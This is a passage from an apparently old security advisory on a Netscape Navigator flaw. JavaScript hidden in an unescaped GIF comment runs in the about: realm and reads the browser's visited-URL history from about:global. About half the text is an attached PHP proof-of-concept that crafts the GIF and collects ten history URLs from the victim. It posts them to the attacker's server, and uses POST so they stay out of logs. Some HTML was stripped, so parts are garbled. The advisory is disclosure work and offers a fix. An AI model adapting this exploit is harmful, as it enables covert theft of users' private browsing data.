to documents at another domain." Now there is the protocol "about:" that is used for some special tasks. about: - shows Netscape version and copyrights about:blank - shows a blank document about:config - shows Browser configuration. about:global - shows Information about the Netscape global history about: - shows Information about the specified url .. There are some other about: documents (try grepping the netscape binary). about:global is very interesting since all visited documents are listed there. So I tried to find a way to access this information. I created a frameset with 2 frames. The first Frame (called foo) contains about:global. Using , or document.location.href="about.global"; for setting this url did not work. So I used the following trick to make it work: My intention is that the second frame (called bar) grabs 10 urls in the first frame using javascript and sends them to the server. Accessing parent.frames["foo"].document.links does not work since foo is displaying an about: document and bar is a normal http document: "access disallowed from scripts at blah to documents..." So I tried to find a way to start a javascript within an about: document. about: comes into mind since there are a lot server specified values. First I tried to inject javascript using the url of the script. But since this url is encoded (space => %20 etc.) there is no way in. Modifying the Content-Type (File MIME Type) did not work either because Netscape opens a "Save as..." window when supplying an unknown mimetype. Then I remembered that Netscape shows the comment included in gif files. A quick test showed that the comment is not escaped. So Javascript in gif comments is executed in the about: realm. This means that this script can then access the content of about:global. nice. The following script included in the comment reads 10 urls in the about:global frame (foo), stores them in the form and finally submits this form. The server has 10 urls of about:global urls now. Accessing about:config should be possible too, but I did not try it. { Solution }-------------------------------------------------------- Disable Javascript Upgrade to 4.77 { Exploit }--------------------------------------------------------- attached -------------------------------------------------------------------- Florian Wesch (fw@dividuum.de) http://dividuum.de */ $self="http://".$SERVER_NAME.(($SERVER_PORT==80)?"":":$SERVER_PORT").$PHP_SELF; if (strlen($self)>64) { echo "Url of $self is too long. 64 maximum.
"; echo "You can change this but I think 64 should be enough for anybody ;-)"; exit; } if (!isset($mode)) $mode="intro"; // If urllist is submitted if (isset($u)) $mode="showhist"; switch ($mode) { case "intro": ?> Submit 10 urls of your history
Waiting 5 seconds...

'.*/ /* I'm using POST so the submitted urls do not appear in the logfile */ "

')); $gif.= "00000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="0000000000000000000000000000000000000000000"; $gif.="00000000000002c000000000a000a00000813004708"; $gif.="1c48b0a0c18308132a5cc8b061c28000003b"; echo pack("H".strlen($gif), $gif); break; case "showhist": $urls=explode("|",$u); echo "

Top 10 urls in about:global

"; foreach ($urls as $url) { echo "$url
"; } }; ?>